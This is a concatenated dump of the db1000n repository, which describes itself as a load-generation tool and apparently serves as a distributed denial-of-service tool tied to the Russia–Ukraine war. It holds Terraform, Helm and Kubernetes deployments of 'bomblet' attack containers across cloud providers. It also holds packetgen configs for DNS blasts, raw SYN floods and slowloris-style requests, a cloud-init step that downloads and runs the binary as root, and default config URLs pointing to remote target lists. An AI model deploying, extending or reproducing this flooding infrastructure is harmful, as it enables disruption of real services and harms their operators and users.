"prefix" { 8 | default = "main" 9 | description = "The default prefix for resources." 10 | } 11 | 12 | variable "attack_commands" { 13 | default = null 14 | description = "The command to execute an attack with support of specifying additional flags." 15 | } 16 | 17 | variable "attack_environment_variables" { 18 | default = { "ENABLE_PRIMITIVE" : "false" } 19 | description = "Environment variables for the container." 
20 | } 21 | -------------------------------------------------------------------------------- /.ko.yaml: -------------------------------------------------------------------------------- 1 | defaultBaseImage: gcr.io/distroless/static 2 | builds: 3 | - id: db1000n 4 | dir: . 5 | main: . 6 | env: 7 | - CGO_ENABLED=0 8 | flags: 9 | - -tags=encrypted 10 | ldflags: 11 | - -s -w 12 | - -extldflags "-static" 13 | - -X github.com/Arriven/db1000n/src/utils/ota.Version={{ .Env.VERSION }} 14 | - -X github.com/Arriven/db1000n/src/utils.ProtectedKeys={{ .Env.PROTECTED_KEYS }} 15 | - -X github.com/Arriven/db1000n/src/job/config.DefaultConfig={{ .Env.DEFAULT_CONFIG_VALUE }} 16 | - -X github.com/Arriven/db1000n/src/job.DefaultConfigPathCSV={{ .Env.DEFAULT_CONFIG_PATH }} 17 | -------------------------------------------------------------------------------- /examples/config/advanced/packetgen-dnsblast.yaml: -------------------------------------------------------------------------------- 1 | jobs: 2 | - type: packetgen 3 | args: 4 | static_packet: true # will only generate packet once instead of doing it on every iteration 5 | connection: 6 | type: net 7 | args: 8 | protocol: "udp" 9 | address: "localhost:53" 10 | packet: 11 | payload: 12 | type: dns 13 | data: 14 | id: "{{ random_int_n 10000 }}" 15 | op_code: 0 16 | rd: true 17 | questions: 18 | - name: "{{ random_alphanum 10 }}.example.com" 19 | type: 1 20 | class: 1 21 | -------------------------------------------------------------------------------- /kubernetes/helm-charts/README.md: -------------------------------------------------------------------------------- 1 | # db1000n Helm charts 2 | 3 | ## If you want to use plain manifests, see [Manifests](/db1000n/advanced-docs/kubernetes/manifests/) 4 | 5 | This is a Helm chart for Kubernetes 6 | 7 | ## Prerequisites 8 | 9 | Make sure that you installed `helm` package on your local machine and you have connection to the Kubernetes cluster. 
10 | 11 | ## Install a release 12 | 13 | ```bash 14 | cd kubernetes/helm-charts/ 15 | helm upgrade --install \ 16 | --create-namespace \ 17 | --namespace=db1000n \ 18 | -f values.yaml db1000n . 19 | ``` 20 | 21 | ## Destroy a release 22 | 23 | ```bash 24 | helm uninstall db1000n -n db1000n 25 | ``` 26 | -------------------------------------------------------------------------------- /terraform/hetzner_cloud/variables.tf: -------------------------------------------------------------------------------- 1 | variable "hcloud_token" { 2 | type = string 3 | sensitive = true 4 | } 5 | 6 | variable "ssh_public_key" { 7 | type = string 8 | } 9 | 10 | # https://registry.terraform.io/providers/hetznercloud/hcloud/latest/docs/resources/server#location 11 | variable "location" { 12 | type = string 13 | default = "hel1" 14 | } 15 | 16 | variable "instance_count" { 17 | type = number 18 | default = 1 19 | } 20 | 21 | # https://www.hetzner.com/cloud 22 | variable "server_type" { 23 | type = string 24 | default = "cx11" 25 | } 26 | 27 | variable "os_type" { 28 | type = string 29 | default = "ubuntu-20.04" 30 | } 31 | -------------------------------------------------------------------------------- /kubernetes/helm-charts/values.yaml: -------------------------------------------------------------------------------- 1 | replicaCount: 1 2 | 3 | image: 4 | repository: ghcr.io/arriven/db1000n 5 | pullPolicy: Always 6 | # Available images: https://github.com/Arriven/db1000n/pkgs/container/db1000n 7 | tag: latest 8 | 9 | envVars: 10 | - name: "ENABLE_PRIMITIVE" 11 | value: "false" 12 | 13 | resources: 14 | {} 15 | # limits: 16 | # cpu: 2 17 | # memory: 2Gi 18 | # requests: 19 | # cpu: 100m 20 | # memory: 128Mi 21 | 22 | imagePullSecrets: [] 23 | nameOverride: "" 24 | fullnameOverride: "" 25 | 26 | podAnnotations: {} 27 | podSecurityContext: {} 28 | securityContext: {} 29 | nodeSelector: {} 30 | tolerations: [] 31 | affinity: {} 32 | 
-------------------------------------------------------------------------------- /pyproject.toml: -------------------------------------------------------------------------------- 1 | [tool.poetry] 2 | name = "db1000n-docs" 3 | version = "0.1.0" 4 | description = "Documentation for DB1000N project with MkDocs" 5 | authors = ["Bohdan Ivashko "] 6 | 7 | [tool.poetry.dependencies] 8 | python = "^3.10" 9 | mkdocs = "^1.2.3" 10 | mkdocs-include-markdown-plugin = "^3.3.0" 11 | mkdocs-material = "^8.2.5" 12 | mkdocs-minify-plugin = "^0.5.0" 13 | mkdocs-redirects = "^1.0.3" 14 | mkdocs-static-i18n = "^0.44" 15 | mkdocs-git-tag-plugin = "^0.1.0" 16 | mdx_truly_sane_lists = "^1.2" 17 | 18 | [tool.poetry.dev-dependencies] 19 | 20 | [build-system] 21 | requires = ["poetry-core>=1.0.0"] 22 | build-backend = "poetry.core.masonry.api" 23 | -------------------------------------------------------------------------------- /src/core/packetgen/raw_conn_windows.go: -------------------------------------------------------------------------------- 1 | //go:build windows 2 | // +build windows 3 | 4 | package packetgen 5 | 6 | import "errors" 7 | 8 | // unsupported on windows 9 | type rawConn struct{} 10 | 11 | func openRawConn() (*rawConn, error) { 12 | return nil, errors.New("raw connections not supported on windows") 13 | } 14 | 15 | func (conn *rawConn) Write(packet Packet) (n int, err error) { 16 | return 0, errors.New("raw connections not supported on windows") 17 | } 18 | 19 | func (conn *rawConn) Close() error { 20 | return nil 21 | } 22 | 23 | func (conn *rawConn) Target() string { return "raw://" } 24 | 25 | func (conn *rawConn) Read(_ []byte) (int, error) { return 0, nil } 26 | -------------------------------------------------------------------------------- /terraform/aws_eks/modules/kubernetes/variables.tf: -------------------------------------------------------------------------------- 1 | variable "profile" { 2 | description = "AWS profile" 3 | } 4 | 5 | variable "vpc_id" { 6 | 
description = "VPC ID" 7 | } 8 | 9 | variable "cluster_name" { 10 | description = "EKS cluster name" 11 | } 12 | 13 | variable "cluster_endpoint" { 14 | description = "EKS cluster endpoint" 15 | } 16 | 17 | variable "cluster_ca_data" { 18 | description = "EKS cluster certificate authority data" 19 | } 20 | 21 | variable "worker_node_iam_role_arn" { 22 | description = "EKS worker node role ARN" 23 | } 24 | 25 | variable "autoscaler_iam_role_arn" { 26 | description = "EKS cluster autoscaler role ARN" 27 | } -------------------------------------------------------------------------------- /.github/workflows/terraformci.yaml: -------------------------------------------------------------------------------- 1 | name: terraform-ci 2 | 3 | on: 4 | push: 5 | branches: 6 | - main 7 | pull_request: 8 | branches: 9 | - main 10 | paths: 11 | - 'terraform/**' 12 | 13 | jobs: 14 | validate-fmt-check: 15 | runs-on: ubuntu-latest 16 | name: Validate and format terraform configuration 17 | steps: 18 | - name: Checkout 19 | uses: actions/checkout@v2 20 | - name: terraform validate 21 | uses: dflook/terraform-validate@v1 22 | with: 23 | path: terraform 24 | - name: terraform fmt 25 | uses: dflook/terraform-fmt-check@v1 26 | with: 27 | path: terraform 28 | -------------------------------------------------------------------------------- /examples/config/advanced/packetgen.yaml: -------------------------------------------------------------------------------- 1 | jobs: 2 | - type: packetgen 3 | args: 4 | connection: 5 | type: raw 6 | args: 7 | name: "ip4:tcp" 8 | address: "0.0.0.0" 9 | packet: 10 | network: 11 | type: ipv4 12 | data: 13 | src_ip: "{{ local_ip }}" 14 | dst_ip: '{{ resolve_host "localhost" }}' 15 | transport: 16 | type: tcp 17 | data: 18 | src_port: "{{ random_port }}" 19 | dst_port: "1234" 20 | flags: 21 | syn: true 22 | payload: 23 | type: raw 24 | data: 25 | payload: "test" 26 | -------------------------------------------------------------------------------- 
/examples/config/advanced/packetgen-ipv6.yaml: -------------------------------------------------------------------------------- 1 | jobs: 2 | - type: packetgen 3 | args: 4 | connection: 5 | type: raw 6 | args: 7 | name: "ip6:tcp" 8 | address: "::1" 9 | packet: 10 | network: 11 | type: ipv6 12 | data: 13 | src_ip: "{{ local_ipv6 }}" 14 | dst_ip: '{{ resolve_host_ipv6 "localhost" }}' 15 | transport: 16 | type: tcp 17 | data: 18 | src_port: "{{ random_port }}" 19 | dst_port: "{{ random_port }}" 20 | flags: 21 | syn: true 22 | payload: 23 | type: raw 24 | data: 25 | payload: "test" 26 | -------------------------------------------------------------------------------- /terraform/azure/bomblet/main.tf: -------------------------------------------------------------------------------- 1 | resource "azurerm_container_group" "main" { 2 | count = var.bomblet_count 3 | name = format("%s-%s", "${var.prefix}-${var.region}", format("%02d", count.index + 1)) 4 | location = var.region 5 | resource_group_name = var.resource_group_name 6 | ip_address_type = "None" 7 | os_type = "Linux" 8 | restart_policy = "Always" 9 | 10 | container { 11 | name = "main" 12 | image = var.attack_image 13 | cpu = var.attack_cpu 14 | memory = var.attack_memory 15 | 16 | environment_variables = var.attack_environment_variables 17 | commands = var.attack_commands 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /src/utils/metrics/stats_tracker.go: -------------------------------------------------------------------------------- 1 | package metrics 2 | 3 | func NewStatsTracker(metrics *Metrics) *StatsTracker { 4 | return &StatsTracker{metrics: metrics} 5 | } 6 | 7 | // StatsTracker generalizes tracking stats changes between reports 8 | type StatsTracker struct { 9 | lastStats PerTargetStats 10 | lastTotals Stats 11 | metrics *Metrics 12 | } 13 | 14 | func (st *StatsTracker) sumStats(groupTargets bool) (stats PerTargetStats, totals Stats, statsInterval 
PerTargetStats, totalsInterval Stats) { 15 | stats, totals = st.metrics.SumAllStats(groupTargets) 16 | statsInterval, totalsInterval = stats.Diff(st.lastStats), Diff(totals, st.lastTotals) 17 | st.lastStats, st.lastTotals = stats, totals 18 | 19 | return 20 | } 21 | -------------------------------------------------------------------------------- /terraform/vultr/main.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | vultr = { 4 | source = "vultr/vultr" 5 | version = "2.10.0" 6 | } 7 | } 8 | } 9 | 10 | resource "vultr_ssh_key" "ssh_key" { 11 | name = "my-ssh-key" 12 | ssh_key = file("${var.key}.pub") 13 | } 14 | 15 | resource "vultr_instance" "my_instance" { 16 | count = var.num_inst 17 | plan = var.plan 18 | region = var.region 19 | app_id = var.app 20 | ssh_key_ids = [vultr_ssh_key.ssh_key.id] 21 | 22 | provisioner "remote-exec" { 23 | script = "scripts/deploy.sh" 24 | 25 | connection { 26 | host = self.main_ip 27 | private_key = file("${var.key}") 28 | } 29 | } 30 | } 31 | 32 | 33 | -------------------------------------------------------------------------------- /examples/config/advanced/packetgen-slowloris.yaml: -------------------------------------------------------------------------------- 1 | jobs: 2 | - type: packetgen 3 | args: 4 | interval: "10s" 5 | connection: 6 | type: net 7 | args: 8 | protocol: "udp" 9 | address: "google.com:1234" 10 | tls_config: 11 | insecure_skip_verify: true 12 | packets: 13 | - packet: 14 | payload: 15 | type: raw 16 | data: 17 | payload: "POST /someapi HTTP/1.1\nHost: localhost\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 1000\n\n" 18 | - count: 1000 19 | packet: 20 | payload: 21 | type: raw 22 | data: 23 | payload: "a" 24 | -------------------------------------------------------------------------------- /terraform/hetzner_cloud/user_data.yml: -------------------------------------------------------------------------------- 1 | 
#cloud-config 2 | runcmd: 3 | - wget -c https://github.com/Arriven/db1000n/releases/latest/download/db1000n_linux_amd64.tar.gz -O - | tar -xz 4 | - systemctl daemon-reload 5 | - systemctl enable db1000n 6 | - systemctl start db1000n 7 | 8 | write_files: 9 | - content: | 10 | [Unit] 11 | Description=db1000n service 12 | After=syslog.target network.target 13 | 14 | [Service] 15 | SuccessExitStatus=143 16 | 17 | User=root 18 | Group=root 19 | 20 | Type=simple 21 | 22 | WorkingDirectory=/ 23 | ExecStart=/db1000n 24 | ExecStop=/bin/kill -15 $MAINPID 25 | 26 | [Install] 27 | WantedBy=multi-user.target 28 | path: /etc/systemd/system/db1000n.service 29 | -------------------------------------------------------------------------------- /.github/workflows/test.yaml: -------------------------------------------------------------------------------- 1 | name: Test 2 | 3 | on: 4 | push: 5 | branches: 6 | - "main" 7 | pull_request: 8 | paths: 9 | - "src/**" 10 | - "main.go" 11 | - "go.mod" 12 | - "go.sum" 13 | 14 | jobs: 15 | test: 16 | strategy: 17 | matrix: 18 | go-version: [1.18.x] 19 | os: [ubuntu-latest, macos-latest, windows-latest] 20 | runs-on: ${{ matrix.os }} 21 | steps: 22 | - name: Install Go 23 | uses: actions/setup-go@v2 24 | with: 25 | go-version: ${{ matrix.go-version }} 26 | - name: Checkout code 27 | uses: actions/checkout@v2 28 | - name: Build 29 | run: go build ./... 30 | - name: Test 31 | run: go test ./... 
32 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Binaries for programs and plugins 2 | *.exe 3 | *.exe~ 4 | *.dll 5 | *.so 6 | *.dylib 7 | 8 | # Test binary, built with `go test -c` 9 | *.test 10 | 11 | # Output of the go coverage tool, specifically when used with LiteIDE 12 | *.out 13 | 14 | # Dependency directories (remove the comment below to include it) 15 | # vendor/ 16 | 17 | main 18 | config.json 19 | 20 | # macOS 21 | .DS_Store 22 | 23 | # Ansible 24 | **/inventory.cfg 25 | 26 | # Terraform 27 | **/.terraform* 28 | **/terraform.tfstate* 29 | 30 | # JetBrains 31 | .idea 32 | 33 | # VScode 34 | .vscode 35 | 36 | # Installation artifacts 37 | *.tar.gz 38 | db1000n 39 | *.md5 40 | md5sum.txt 41 | 42 | .history 43 | 44 | # OpenVPN data 45 | /openvpn/*.ovpn 46 | /openvpn/auth.txt 47 | -------------------------------------------------------------------------------- /ansible/linux/countries.txt: -------------------------------------------------------------------------------- 1 | Hong Kong 2 | Singapore 3 | India 4 | Canada 5 | Japan 6 | Germany 7 | Mexico 8 | Australia 9 | United Kingdom 10 | Netherlands 11 | Spain 12 | South Korea 13 | Switzerland 14 | France 15 | Philippines 16 | Malaysia 17 | Sri Lanka 18 | Italy 19 | Pakistan 20 | Kazakhstan 21 | Thailand 22 | Indonesia 23 | Taiwan 24 | Vietnam 25 | Macau 26 | Cambodia 27 | Mongolia 28 | Laos 29 | Myanmar 30 | Nepal 31 | Kyrgyzstan 32 | Uzbekistan 33 | Bangladesh 34 | Bhutan 35 | Brazil 36 | Panama 37 | Chile 38 | Argentina 39 | Bolivia 40 | Colombia 41 | Venezuela 42 | Ecuador 43 | Guatemala 44 | Peru 45 | Uruguay 46 | Bahamas 47 | Sweden 48 | Romania 49 | Turkey 50 | Ireland 51 | Iceland 52 | Norway 53 | Denmark 54 | Belgium 55 | Greece 56 | Portugal 57 | Austria 58 | Finland -------------------------------------------------------------------------------- 
/terraform/vultr/README.md: -------------------------------------------------------------------------------- 1 | # Vultr deployment 2 | 3 | ## Requirements 4 | 5 | * Vultr account 6 | * API token 7 | * `terraform` 8 | 9 | ## Deploy 10 | 11 | ```bash 12 | export VULTR_API_KEY="Your Vultr API Key" 13 | terraform init 14 | terraform plan -var "key=" -var "num_inst=" 15 | terraform apply -var "key=" -var "num_inst=" 16 | ``` 17 | 18 | ## Destroy 19 | 20 | To delete all the resources that were created run 21 | 22 | ```bash 23 | terraform destroy 24 | ``` 25 | 26 | ## Tips 27 | 28 | Deploy script installs vnstat util that is useful for monitoring server network performance. 29 | Example, get network statistics for the last 5 hours: 30 | 31 | ```bash 32 | ssh root@ip vnstat -h 5 33 | ``` 34 | -------------------------------------------------------------------------------- /terraform/heroku/main.tf: -------------------------------------------------------------------------------- 1 | resource "random_integer" "random" { 2 | min = 1 3 | max = 9999999 4 | } 5 | 6 | resource "heroku_app" "app" { 7 | name = "db1000n-${random_integer.random.result}" 8 | region = var.region 9 | 10 | config_vars = { 11 | GOVERSION = "1.18" 12 | CONFIG = "${var.config_path}" 13 | } 14 | 15 | buildpacks = [ 16 | "heroku/go" 17 | ] 18 | } 19 | 20 | resource "heroku_build" "build" { 21 | app_id = heroku_app.app.id 22 | 23 | source { 24 | url = "${var.repo}/archive/v${var.app_version}.tar.gz" 25 | } 26 | } 27 | 28 | resource "heroku_formation" "formation" { 29 | app_id = heroku_app.app.id 30 | type = "worker" 31 | quantity = var.instance_count 32 | size = var.instance_type 33 | depends_on = [heroku_build.build] 34 | } 35 | -------------------------------------------------------------------------------- /terraform/digital_ocean/README.md: -------------------------------------------------------------------------------- 1 | # Digital Ocean deployment 2 | 3 | ## Requirements 4 | 5 | - Digital Ocean account 
6 | - API token (Go to API - Personal access tokens) and generate Personal access token (with write permissions) 7 | - `terraform` (1.0+) installed 8 | 9 | ## Deploy 10 | 11 | To deploy: 12 | 13 | ```sh 14 | export DO_TOKEN= 15 | terraform init 16 | terraform plan -var "do_token=${DO_TOKEN}" 17 | terraform apply -var "do_token=${DO_TOKEN}" 18 | ``` 19 | 20 | After deployment (usually takes 5-10 mins) go to [Apps List](https://cloud.digitalocean.com/apps), find an app with name `db1000n` and check Runtime Logs. 21 | 22 | ## Destroy 23 | 24 | To destroy: 25 | 26 | ```sh 27 | export DO_TOKEN= 28 | terraform destroy -var "do_token=${DO_TOKEN}" 29 | ``` 30 | -------------------------------------------------------------------------------- /terraform/heroku/variables.tf: -------------------------------------------------------------------------------- 1 | variable "email" { 2 | type = string 3 | } 4 | 5 | variable "api_key" { 6 | type = string 7 | sensitive = true 8 | } 9 | 10 | variable "region" { 11 | type = string 12 | default = "eu" 13 | } 14 | 15 | variable "repo" { 16 | type = string 17 | default = "https://github.com/Arriven/db1000n" 18 | } 19 | 20 | variable "app_version" { 21 | type = string 22 | } 23 | 24 | variable "instance_count" { 25 | type = number 26 | default = 1 27 | } 28 | 29 | # https://devcenter.heroku.com/articles/dyno-types 30 | variable "instance_type" { 31 | type = string 32 | default = "free" 33 | } 34 | 35 | variable "config_path" { 36 | type = string 37 | default = "https://raw.githubusercontent.com/db1000n-coordinators/LoadTestConfig/main/config.v0.7.json" 38 | } 39 | -------------------------------------------------------------------------------- /.github/workflows/markdownlint.yaml: -------------------------------------------------------------------------------- 1 | name: markdownlint 2 | on: 3 | push: 4 | tags: 5 | - v* 6 | branches: 7 | - master 8 | - main 9 | pull_request: 10 | paths: 11 | - "**.md" 12 | - 
".github/workflows/markdownlint.yaml" 13 | - "db1000n.rb" 14 | permissions: 15 | contents: read 16 | # Optional: allow read access to pull request. Use with `only-new-issues` option. 17 | # pull-requests: read 18 | jobs: 19 | markdownlint: 20 | name: Lint repository 21 | runs-on: ubuntu-latest 22 | steps: 23 | - uses: actions/checkout@v2 24 | - name: Set up Ruby 25 | uses: ruby/setup-ruby@v1 26 | with: 27 | ruby-version: "3.1" 28 | - name: Install mdl 29 | run: gem install mdl 30 | - name: Run markdownlint 31 | run: mdl -s ./db1000n.rb . 32 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:1.18 as builder 2 | 3 | WORKDIR /build 4 | # pre-copy/cache go.mod for pre-downloading dependencies and only redownloading them in subsequent builds if they change 5 | COPY go.mod . 6 | RUN go mod download && go mod verify 7 | COPY . . 8 | ARG ENCRYPTION_KEYS 9 | ARG DEFAULT_CONFIG_VALUE 10 | ARG DEFAULT_CONFIG_PATH 11 | ARG CA_PATH_VALUE 12 | ARG PROMETHEUS_BASIC_AUTH 13 | RUN make build_encrypted 14 | 15 | FROM alpine:3.15.2 as advanced 16 | 17 | RUN apk add --no-cache --update curl 18 | 19 | WORKDIR /usr/src/app 20 | COPY --from=builder /build/db1000n . 21 | 22 | CMD ["./db1000n", "--enable-primitive=false"] 23 | 24 | FROM alpine:3.15.2 25 | 26 | RUN apk add --no-cache --update curl 27 | 28 | WORKDIR /usr/src/app 29 | COPY --from=builder /build/db1000n . 
30 | 31 | VOLUME /usr/src/app/config 32 | 33 | ENTRYPOINT ["./db1000n"] 34 | -------------------------------------------------------------------------------- /terraform/digital_ocean/variables.tf: -------------------------------------------------------------------------------- 1 | variable "do_token" { 2 | type = string 3 | sensitive = true 4 | } 5 | 6 | variable "repo" { 7 | type = string 8 | default = "https://github.com/Arriven/db1000n" 9 | } 10 | 11 | variable "instance_count" { 12 | type = number 13 | default = 1 14 | } 15 | 16 | # https://docs.digitalocean.com/reference/api/api-reference/#operation/list_instance_sizes 17 | variable "instance_size_slug" { 18 | type = string 19 | default = "professional-xs" 20 | } 21 | 22 | # https://docs.digitalocean.com/reference/api/api-reference/#operation/list_all_regions 23 | variable "region" { 24 | type = string 25 | default = "nyc1" 26 | } 27 | 28 | variable "config_path" { 29 | type = string 30 | default = "https://raw.githubusercontent.com/db1000n-coordinators/LoadTestConfig/main/config.v0.7.json" 31 | } 32 | -------------------------------------------------------------------------------- /terraform/aws_eks/outputs.tf: -------------------------------------------------------------------------------- 1 | # data sources 2 | output "account_id" { 3 | description = "AWS Account ID" 4 | value = data.aws_caller_identity.current.account_id 5 | } 6 | 7 | output "caller_arn" { 8 | description = "User ARN" 9 | value = data.aws_caller_identity.current.arn 10 | } 11 | 12 | output "caller_user" { 13 | value = data.aws_caller_identity.current.user_id 14 | } 15 | 16 | # variables 17 | output "region" { 18 | description = "AWS region" 19 | value = var.region 20 | } 21 | 22 | output "profile" { 23 | description = "AWS profile" 24 | value = var.profile 25 | } 26 | 27 | output "projects" { 28 | description = "AWS project" 29 | value = var.project 30 | } 31 | 32 | output "environment" { 33 | description = "AWS environment" 34 | value = 
terraform.workspace 35 | } -------------------------------------------------------------------------------- /terraform/gcp_expressvpn/README.md: -------------------------------------------------------------------------------- 1 | # GCP + ExpressVPN deployment 2 | 3 | ## Requirements 4 | 5 | - [GCP account](http://console.cloud.google.com) 6 | - Subscription on [expressvpn.com](https://www.expressvpn.com) (get the activation code) 7 | - `terraform` installed 8 | 9 | ## Init 10 | 11 | To init Terraform run: 12 | 13 | ```sh 14 | terraform init 15 | ``` 16 | 17 | Create a terraform/gcp_expressvpn/terraform.tfvars file and set these two variable values to yours 18 | 19 | ```sh 20 | project_id = "google-project-id" 21 | expressvpn_key = "expressvpn-activation-code" 22 | ``` 23 | 24 | Other vars can be overwritten in this file if needed. 25 | 26 | ## Deploy 27 | 28 | To deploy run: 29 | 30 | ```sh 31 | terraform apply 32 | ``` 33 | 34 | ## Destroy 35 | 36 | To destroy infrastructure use commands: 37 | 38 | ```sh 39 | terraform destroy 40 | ``` 41 | -------------------------------------------------------------------------------- /.github/workflows/test-installer.yaml: -------------------------------------------------------------------------------- 1 | name: Test install.sh 2 | 3 | on: 4 | push: 5 | branches: 6 | - "main" 7 | paths: 8 | - 'install.sh' 9 | - '.github/workflows/test-installer.yaml' 10 | 11 | jobs: 12 | ubuntu-mac-test: 13 | strategy: 14 | matrix: 15 | os: [ubuntu-latest, macos-latest] 16 | runs-on: ${{ matrix.os }} 17 | steps: 18 | - name: Checkout code 19 | uses: actions/checkout@v2 20 | - name: Run ShellCheck 21 | uses: ludeeus/action-shellcheck@master 22 | - name: Installer 23 | run: ./install.sh 24 | windows-test: 25 | strategy: 26 | matrix: 27 | os: [windows-latest] 28 | runs-on: ${{ matrix.os }} 29 | steps: 30 | - name: Checkout code 31 | uses: actions/checkout@v2 32 | - name: Installer 33 | run: ./install.sh 34 | 
-------------------------------------------------------------------------------- /terraform/hetzner_cloud/README.md: -------------------------------------------------------------------------------- 1 | # Hetzner Cloud deployment 2 | 3 | ## Requirements 4 | 5 | - Hetzner Cloud account 6 | - API token (Go to Project - Security - API Tokens) and create a token 7 | - `terraform` (1.0+) installed 8 | 9 | ## Deploy 10 | 11 | To deploy: 12 | 13 | ```sh 14 | export HCLOUD_TOKEN= 15 | export SSH_PUBLIC_KEY="" 16 | terraform init 17 | terraform plan -var "hcloud_token=${HCLOUD_TOKEN}" -var "ssh_public_key=${SSH_PUBLIC_KEY}" 18 | terraform apply -var "hcloud_token=${HCLOUD_TOKEN}" -var "ssh_public_key=${SSH_PUBLIC_KEY}" 19 | ``` 20 | 21 | ## Destroy 22 | 23 | To destroy: 24 | 25 | ```sh 26 | export HCLOUD_TOKEN= 27 | export SSH_PUBLIC_KEY="" 28 | terraform destroy -var "hcloud_token=${HCLOUD_TOKEN}" -var "ssh_public_key=${SSH_PUBLIC_KEY}" 29 | ``` 30 | -------------------------------------------------------------------------------- /terraform/aws_ec2/README.md: -------------------------------------------------------------------------------- 1 | # AWS EC2 deployment 2 | 3 | ## Requirements 4 | 5 | - AWS account 6 | - `terraform` installed 7 | 8 | ## Deploy 9 | 10 | To deploy run: 11 | 12 | ```sh 13 | terraform apply -var-file="ireland.tfvars" 14 | ``` 15 | 16 | You can create new `*.tfvars` files for different regions and accounts. 17 | To switch between regions you can use `terraform workspace` command. 
18 | 19 | For example: 20 | 21 | ```sh 22 | terraform init 23 | terraform workspace new eu 24 | terraform apply -var-file="ireland.tfvars" 25 | terraform workspace new us 26 | terraform apply -var-file="useast.tfvars" 27 | ``` 28 | 29 | ## Destroy 30 | 31 | To destroy infrastructure use commands: 32 | 33 | ```sh 34 | terraform workspace select eu 35 | terraform destroy -var-file="ireland.tfvars" 36 | terraform workspace select us 37 | terraform destroy -var-file="useast.tfvars" 38 | ``` 39 | -------------------------------------------------------------------------------- /kubernetes/manifests/deployment.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | apiVersion: v1 3 | kind: Namespace 4 | metadata: 5 | name: db1000n 6 | 7 | --- 8 | apiVersion: apps/v1 9 | kind: Deployment 10 | metadata: 11 | name: db1000n 12 | namespace: db1000n 13 | labels: 14 | app: db1000n 15 | spec: 16 | replicas: 1 17 | selector: 18 | matchLabels: 19 | app: db1000n 20 | template: 21 | metadata: 22 | labels: 23 | app: db1000n 24 | spec: 25 | containers: 26 | - name: db1000n 27 | image: ghcr.io/arriven/db1000n:latest 28 | env: 29 | - name: ENABLE_PRIMITIVE 30 | value: "false" 31 | imagePullPolicy: Always 32 | resources: 33 | requests: 34 | memory: "512Mi" 35 | cpu: "500m" 36 | limits: 37 | memory: "2048Mi" 38 | cpu: "2" 39 | -------------------------------------------------------------------------------- /src/utils/templates/math.go: -------------------------------------------------------------------------------- 1 | package templates 2 | 3 | func mod(lhs, rhs int) int { 4 | return lhs % rhs 5 | } 6 | 7 | func add(lhs, rhs int) int { 8 | return lhs + rhs 9 | } 10 | 11 | func sub(lhs, rhs int) int { 12 | return lhs - rhs 13 | } 14 | 15 | func umod(lhs, rhs uint) uint { 16 | return lhs % rhs 17 | } 18 | 19 | func uadd(lhs, rhs uint) uint { 20 | return lhs + rhs 21 | } 22 | 23 | func usub(lhs, rhs uint) uint { 24 | return lhs - rhs 25 | } 26 | 27 | 
func mod64(lhs, rhs int64) int64 { 28 | return lhs % rhs 29 | } 30 | 31 | func add64(lhs, rhs int64) int64 { 32 | return lhs + rhs 33 | } 34 | 35 | func sub64(lhs, rhs int64) int64 { 36 | return lhs - rhs 37 | } 38 | 39 | func umod64(lhs, rhs uint64) uint64 { 40 | return lhs % rhs 41 | } 42 | 43 | func uadd64(lhs, rhs uint64) uint64 { 44 | return lhs + rhs 45 | } 46 | 47 | func usub64(lhs, rhs uint64) uint64 { 48 | return lhs - rhs 49 | } 50 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Death by 1000 needles 2 | 3 | See [Docs](https://arriven.github.io/db1000n) 4 | 5 | [![Made in Ukraine](https://img.shields.io/badge/made_in-ukraine-ffd700.svg?labelColor=0057b7)](https://stand-with-ukraine.pp.ua) 6 | 7 | This is a simple distributed load generation tool written in Go. 8 | It is able to fetch a simple JSON config from a local or remote location. 9 | The config describes which load generation jobs should be launched in parallel. 10 | There are other existing tools doing the same kind of job. 11 | I do not intend to copy or replace them but rather provide a simple open source alternative so that users have more options. 12 | Feel free to use it in your load tests (wink-wink). 13 | 14 | The software is provided as is under no guarantee. 15 | I will update both the repository and this documentation as I go during following days (date of writing this is 26th of February 2022, third day of Russian invasion into Ukraine). 
16 | 17 | -------------------------------------------------------------------------------- /kubernetes/manifests/daemonset.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | apiVersion: v1 3 | kind: Namespace 4 | metadata: 5 | name: db1000n 6 | 7 | --- 8 | apiVersion: apps/v1 9 | kind: DaemonSet 10 | metadata: 11 | name: db1000n 12 | namespace: db1000n 13 | labels: 14 | app: db1000n 15 | spec: 16 | selector: 17 | matchLabels: 18 | name: db1000n 19 | template: 20 | metadata: 21 | labels: 22 | name: db1000n 23 | spec: 24 | containers: 25 | - name: db1000n 26 | image: ghcr.io/arriven/db1000n:latest 27 | env: 28 | - name: ENABLE_PRIMITIVE 29 | value: "false" 30 | imagePullPolicy: Always 31 | resources: 32 | requests: 33 | memory: "128Mi" 34 | cpu: "128m" 35 | limits: 36 | memory: "2048Mi" 37 | cpu: "2" 38 | nodeSelector: 39 | db1000n: "true" 40 | terminationGracePeriodSeconds: 30 41 | -------------------------------------------------------------------------------- /terraform/heroku/README.md: -------------------------------------------------------------------------------- 1 | # Heroku deployment 2 | 3 | ## Requirements 4 | 5 | - Heroku account 6 | - API token (Go to Account settings - API Key) and reveal API key 7 | - `terraform` (1.0+) installed 8 | 9 | ## Deploy 10 | 11 | To deploy: 12 | 13 | ```sh 14 | export EMAIL= 15 | export API_KEY= 16 | terraform init 17 | terraform plan -var "email=${EMAIL}" -var "api_key=${API_KEY}" 18 | terraform apply -var "email=${EMAIL}" -var "api_key=${API_KEY}" 19 | ``` 20 | 21 | Go to [apps list](https://dashboard.heroku.com/apps) and ensure that application successfully deployed. 
